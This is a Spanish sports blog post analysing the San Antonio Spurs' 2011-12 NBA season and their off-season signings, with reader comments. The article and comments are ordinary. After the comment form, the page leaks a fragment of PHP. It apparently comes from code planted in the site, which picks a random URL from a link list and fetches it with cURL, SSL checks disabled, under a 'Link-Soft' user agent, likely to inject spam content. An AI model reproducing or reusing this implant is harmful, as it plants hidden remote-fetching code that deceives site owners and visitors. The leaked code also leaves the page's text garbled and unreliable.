San Antonio Spurs: Excelente

27 de July de 2012 por Sancho88
Nos rendimos ante la evidencia: los Spurs volvieron a sorprendernos a todos y superaron ampliamente las expectativas que se habían puesto sobre ellos, que no iban más allá de situarles en una hipotética primera ronda y gracias. De hecho, Denise se convirtió momentáneamente en el Frederic Hermel de TJNBA al pronosticar un ‘Fin de ciclo’. Quizá otro año…

Para los nostálgicos de los 90 (que alguno habrá, digo yo), los Spurs rememoraron paso por paso el primer ‘lockout’ de la era Stern, cuando se proclamaron campeones de la NBA por primera vez en su historia. Sin embargo, si en el 99 sí pudieron llevarse el título, este año no fue posible completar el ‘pentacampeonato’ de Tim Duncan, una leyenda viva que volvió a ofrecernos clases magistrales en todos los aspectos del juego. Y no se completó la gran gesta porque, como bien se apuntó en el análisis de las finales, en algún libro muy antiguo estaba escrito que Lebron y Durant se encontrarían cara a cara en la lucha final por el título de 2012. Pero poco faltó para ver allí a los pupilos de  Popovich. Fueron los mejores de la regular junto a los Bulls, arrasaron a los rivales incluso con mayor brío que los de Chicago y consiguieron 20 victorias consecutivas en tan solo 50 días. Con el 2-0 de ventaja en las finales de conferencia sobre los Thunder, la pregunta era: ¿cómo terminará esto, 4-1 o 4-2 (o 4-0)?

Pero el trío de ases de Oklahoma, más los pivots que se apuntaron a la fiesta, más la pizarra para el recuerdo que planteó  Scott Brooks, dieron la vuelta sorprendentemente a la eliminatoria ganando 4 partidos seguidos y convirtiéndose en el cuarto equipo de la historia en completar una hazaña similar en las finales de conferencia.

Podríamos tirarnos horas y horas analizando los porqués de aquella debacle pero básicamente se pueden resumir en que el equipo se vio superado por una hornada de fuerzas de la naturaleza y el talento de los Spurs no fue suficiente para aguantar el ritmo de los partidos en ambas partes de la cancha. El brazo ejecutor de Durant hizo todo lo demás.

El alumno modélico, el que sacó dieces durante todo el curso, al final no pudo llevarse la matrícula de honor y entrar 5 años después en la lucha por el título. Pero poco importó. Las sensaciones no pueden ser mejores y es prácticamente imposible encontrarles un pero.

Quizá, que Popovich no supo plantear bien las finales contra Oklahoma y no aprovechó la rotación natural de Duncan en DeJuan Blair. Si a esto unimos el mismo efecto con otros dos pilares fundamentales de la segunda unidad en importancia del equipo, como fueron Danny Green y el propio Kawhi Leonard, el resultado fue que la mesa quedó coja por al menos una de las patas y eso fue suficiente para los Thunder. No obstante, el regusto a gran final permaneció por encima del resultado. Ginobili volvió a ser ‘Manudona’ tras una temporada prácticamente en blanco por las lesiones y los Spurs nos divirtieron a todos. Al final, Popovich sacó al abuelete cascarrabias que lleva dentro y la química del equipo se vio afectada. Mención especial al desaparecido Tiago Splitter, que de repente retrocedió una década en el espacio-tiempo y jugó las finales como si fuera un juvenil. Pero en realidad, poco se podía hacer después del bloqueo total sobre Tony Parker. Westbrook y Sefolosha dieron con la tecla para parar al base francés y esto ocasionó un apagón general en las Espuelas. Así, aunque hubieran aplicado todas las enseñanzas de ‘Popo’ durante el curso, éstas no habrían sido suficientes para llegar más lejos. Finalmente, los tres mosqueteros tuvieron que salir al rescate como en los viejos tiempos, pero sus espadas estaban algo oxidadas por el trueno de los Sonics (esto… de Oklahoma).

Lo mejor: Consiguieron perfeccionar un estilo de juego óptimo en la fluidez ofensiva a la par que sencillo en la ejecución. Renunciaron por fin al ‘catenaccio’ baloncestístico y nos alegraron a todos con su cambio de actitud. De esta forma se convirtieron en la segunda amenaza ofensiva de toda la liga solo por detrás de los Nuggets. Les salió realmente bien la salida durante el ‘lockout’ de 4 de sus jugadores -Parker, Green, Blair y Splitter- que comenzaron la temporada a tope después de su experiencia europea. Además, reconstruyeron un equipo con carácter de campeones tan solo moviendo un par de piezas. La llegada de Stephen Jackson desde los Warriors a cambio de Jefferson, unida al rescate de Boris Diaw tras ser cortado por los Bobcats, les permitió dar una nueva vuelta de rosca en su particular concepción del juego en equipo y alcanzar las finales de conferencia imbatidos, tras superar por sendos 4-0 a Jazz y Clippers. Tony Parker lideró el juego de los Spurs y mereció entrar en el quinteto ideal. Esto quedó patente en el enfrentamiento directo contra Paul, el mejor base del año para la NBA, que no fue ni el 50% de sí mismo frente a ‘Olalá’ en semifinales. Y por último, el traspaso de George Hill por Leonard con los Pacers en la noche del draft de 2011, lejos de ser un movimiento arriesgado, se convirtió en el mayor acierto de la temporada, pues el alero californiano demostró valer más que su 15º puesto del draft y cubrió durante todo el año el puesto cojo del equipo que ocupaba Richard Jefferson. Un gran defensor y lanzador exterior que presumiblemente tendrá una gran carrera en la NBA.

Lo peor: Sería injusto ocupar mucho espacio en este apartado. Sinceramente, la temporada de los Spurs fue tan buena que no se pueden ver fallos aparentes. Puede que se equivocaran cortando a Steve Novak pocos días antes del comienzo de temporada, ya el ahora alero de los Knicks posiblemente hubiera aportado algo más que Matt Bonner, pero son menudencias. Rizando el rizo, la retirada de TJ Ford por sus graves problemas cervicales fue un golpe muy duro para el mini sector de ‘streetball’ de la liga. Cada día quedan menos jugadores de este estilo, sin duda son una especie prácticamente extinguida en las duras estepas norteamericanas. En el plano colectivo, el desencanto llegó en esos últimos 4 partidos de la temporada contra los Thunder. El asalto al Álamo en el quinto de la serie fue el golpe mortal que acabó con el equipo. El desencuentro entre Popovich y jugadores importantes de rotación como Splitter, Blair, Green o Matt Bonner fue total. Desaparecieron del mapa y quizá por esa razón los Spurs no llegaron al séptimo partido en casa. Solo quedaron sobre la cancha 6 o 7 jugadores, cuando durante toda la temporada los Spurs se habían caracterizado por confiar en una amplia rotación de al menos 10 efectivos. Leonard o Gary Neal tuvieron algo más de protagonismo que el resto de los secundarios, pero la química ya había desaparecido en el global.

Jugando al GM:

-Los Spurs siguen moviéndose con cabeza. Este año tocaba renovar a Duncan y Buford le ha puesto sobre la mesa unos suculentos 36 millones por 3 años. Así, el mito Duncan sigue candente hasta 2015 por lo menos. Y no le faltaron novias precisamente. Se habló de una pareja Duncan-Garnett en los Celtics incluso. El nuevo contrato de Duncan, que ya tiene 36 ‘castañas’ a los hombros, nos dice mucho del momento tan dulce por el que atraviesa el ala-pívot de las Islas Vírgenes. Varias décadas después volvemos a tener un Jabbar en potencia. Será una delicia verle jugar a los 39. Así, ‘Timmy’ baja su sueldo y se iguala prácticamente con el de Parker, cobrando una cantidad significativamente inferior a la de Ginobili, quien será ‘expiring’ este año. Entre los tres grandes se comen al año entre 36-38 millones, lo cual no significa que el resto del equipo sea una chapuza, ni mucho menos.

-El experimento de Diaw salió medianamente bien y el otrora 1-2-3-4-5 (hoy solo jugador de poste alto) cobrará 9 millones en dos temporadas. Tener un jugador del talento de Diaw siempre es importante, pero a mi juicio no debería tener el rol de titular en el equipo y me parece excesivo lo que va a cobrar. A los Spurs les vendría mejor tener un jugador del estilo de Ekpe Udoh para mejorar su físico y su defensa. Tienen y tenían talento de sobra en la pintura antes de la llegada de Diaw y con la renovación del francés se olvidan del físico y se centran de nuevo en lo técnico.

-Popovich se ha equivocado de plano con Blair y ahora es difícil deshacer el entuerto. Si la opción de equipo sobre el ala-pívot tan solo supone 1 millón de dólares y a cambio te asegura 10 puntos y 5 rebotes por partido, además de intensidad y defensa, lo que tú no puedes hacer es hipotecar el tope salarial prorrogando contratos como el de Diaw por mucho más dinero cuando tienes a Blair que es mejor que el ala-pívot francés y podría renovar por mucho menos. Así que Buford lo tiene difícil en este caso y yo también lo tendría, pero a ver quién es el chulo que le dice algo a Popo… Desde luego, que este jugador disputase solo 7 minutos de media en las finales restó mucha calidad a los Spurs. Ahora se siente a disgusto, no ve su rol por ninguna parte y es comprensible que se quiera ir.

-La renovación del base australiano Pattrick Mills por dos años (el segundo de ellos será una player option), más el fichaje de Nando De Colo por otros dos años reforzarán el juego exterior del equipo. Así como en la pintura existen grandes dudas del papel que van a jugar Tiago Splitter, Matt Bonner y el propio DeJuan Blair (si es que lo renuevan), parece que el ‘backourt’ va bien servido. A Parker y Ginóbili se añade el nuevo contrato de Danny Green (12 millones por 3 años), la player option que puede ejercer Gary Neal, el excepcional panorama que se dibuja en torno a la figura de Cory Joseph (nombrado en el equipo All-Star de la liga de verano de Las Vegas), y ahora también el refuerzo de De Colo más la continuidad de Mills. Hay de todo y para todos los gustos, pero al menos podrían sobrar dos jugadores porque son 7 en total.

-En este punto también toca analizar la renovación de Ginobili. Puede que no sea tan buena opción apostar por él teniendo en cuenta el ‘overbooking’ de nuevos bases-escoltas en el equipo. Puede que fuera una mejor opción gastar sus 10-15 millones por temporada en ofrecerle un compañero de aventuras más digno a Duncan que los que tiene hoy en día. ¿Alguien dijo Cousins?

-Por último, en la posición de alero seguirán Leonard y Jackson. Parece una rotación sólida pues ambos jugadores se complementan y pueden llegar a jugar de falsos ‘4’, incluso juntos. Se podría tratar la renovación de Jackson, que será ‘expiring’ este año por 10 millones de dólares. Viendo a cuanto se paga el kilo de alero en la NBA, supongo que no pedirá menos de 5 millones al año para renovar, pero merece la pena porque es difícil encontrar en el mercado un jugador de sus características. S-Jax volvió a casa a mitad de temporada y se debería quedar al menos dos o tres años más. 15×3 no sería una mala oferta en su caso.

-En definitiva, el equipo seguirá más o menos igual el próximo año. De Colo será la cara nueva y veremos qué  pasa en la pintura con Bonner, Blair y Splitter. Yo diría que ninguno de los tres tiene el contrato seguro y los Spurs escucharán ofertas. En mi opinión, sumar tres jugadores de este calibre te asegura una rotación en la pintura muy completa para rotar a Diaw y Duncan, pero quizá falte algo de músculo y defensa. En este aspecto cayeron por K.O. técnico contra los Thunder, pues no podían defender a ninguno de sus pívots por carencias físicas. Blair necesita ponerse en forma para jugar a un buen nivel defensivo, y de Diaw, Bonner o Splitter no se puede esperar mucho en este aspecto. Otra opción que cobra fuerza en los últimos días es la de Rafael Hettsheimeir. Sería el prototipo de jugador que necesitan estos Spurs. Si lograsen fichar al joven pívot brasileño y deshacerse de Matt Bonner, mejoraría bastante la actual situación del equipo. Además, también se habla de un posible interés por el ‘macedonio’ Bo Mcalebb. En vista de lo que ya han firmado este rumor parece totalmente infundado, pero veremos qué pasa, porque a los Spurs les gusta mucho el estilo europeo y se han propuesto inundar la plantilla de calidad FIBA.

Comenta

14 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Los Spurs ya llevan varios años así y por eso no me preocupan. Una regular season muy buena, con muchos jugadores aportando, pero cuando llegan los PO, se ve que la mitad de esos jugadores no dan la talla y se quedan en nada. Barrer a Utah era sencillo, y con Clippers, con tal de no llegar apretado a ningún final, tampoco es complicado. Quizá podían haber quedado ahí 4-1 y tiene más mérito el 4-0, pero en cuanto les tocara un equipo fuerte se veía que iban fuera.

    Jugadores e PO en la plantilla de Spurs, su big-three, Jackson, Blair si acaso, y Leonard por su defensa.

      Citar

  2. Esteban dice:
    #2

    sancho, no es critica, pero me dan a demasiado largos tus post, lo digo con buena onda

      Citar

  3. simon dice:
    #3

    sancho la calidad del articulo es excelente pero quizás si sintetizaras un poco mas la informacion se haria mas ameno y ligero de leer.
    Por otra parte de acuerdo en casi todo, lo unico que GInobili no creo que vuelva a firmar un contrato por 13-15 ( aunque viendo lo que se están firmando por ahi algunos, bien ginobili los mereceria yo creo que su proximo contrato estará entre 8-12 y eso si me parece una buena cantidad.
    Ademas que si Ginobili me caia bien mejor me cae ahora que tras el argentina estados unidos me lo encontré en las ramblas sentado en una terraza y fue muy simpatico y atento con nosotros. jejeje

      Citar

  4. Melo15 dice:
    #4

    Pues aprovecho esto para decir que RIcky es todo lo contrario, no se dign ni a hacerse una foto conmigo.
    PD: L pregunte pormla lesion y todo XD

      Citar

  5. Esteban dice:
    #5

    ah todos conocen a las figuras del basquet mundial menos yo ejeje

      Citar

  6. MagicJohnson32 dice:
    #6

    Sancho, bienvenido al ingrato mundo del autor de artículos de TJNBA xD Ya os vale, con el pedazo de análisis que se ha currado Sancho, y le criticáis por hacerlo demasiado largo. No sé qué pensaréis de los míos, jojo…

    En fin, a mí me ha gustado mucho, no creo que le sobre ni una palabra 😉

      Citar

  7. MagicJohnson32 dice:
    #7

    Esteban:
    ah todos conocen a las figuras del basquet mundial menos yo ejeje

    Bueno, yo conozco a Fede Kammerich, no sé si sirve como figura del básquet mundial 😀

      Citar

  8. Sebastián dice:
    #8

    Nunca comento, siempre leo.
    Sancho, no hagas caso, excelente análisis.
    El interés que suena de San Antonio por DeMarcus, sería contratarlo via sign and trade o por agencia libre?, su contrato rookie termina dentro de dos años si no me equivoco.

      Citar

  9. melo15 dice:
    #9

    Sebastian, los Spurs por Demarcus tendrian que dara todo el equipo, Cousins es el pivot mas prometedor de la NBA, no creo que los Kings escuchen ofertas por el a menos que sea por un all-star consagrado y joven.

      Citar

  10. German dice:
    #10

    Excelente articulo, cuanto mas extenso mejor aun, no falta nada. Da gusto leerlo.

    Cousins en San Antonio seria genial. Le hace falta tener un entrenador como Popovich a ese chico para sentar cabeza y explotar.

      Citar

  11. Esteban dice:
    #11

    No dije q el analisis no sea bueno, solo me parecio largo, nada mas

    Quiza se debio a q son los spurs y todos los años son mas o menos lo mimso, mismo entrenador, mismas figuras, mismas chances de titulo, etc
    Quiza sea eso

      Citar

  12. Sebastián dice:
    #12

    A tyreke evans le quedan dos años enteros de contrato y a Cousins tres, ambos dijeron que no piensan renovar en Sacramento(recordemos que hasta hace pocos meses no se sabía si la franquicia iba a seguir en la ciudad).
    Eso puede influir para que los Kings cambien a uno de los dos por jugadores más experimentados para intentar mejorar un poco desde ahora mismo.

      Citar

  13. Lucho dice:
    #13

    SIN ANIMO DE OFENDER NI NADA: el que quiera que el articulo sea mas corto, puede no leerlo. O dividirlo. Sinceramente no puedo entender esa critica.
    Brillante articulo Sancho. Segui explayandote todo lo que quieras, sabes escribir y da placer leerte

      Citar

  14. Viru dice:
    #14

    Ni caso, duración apropiada para tratar tantísimos aspectos. Bravo!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>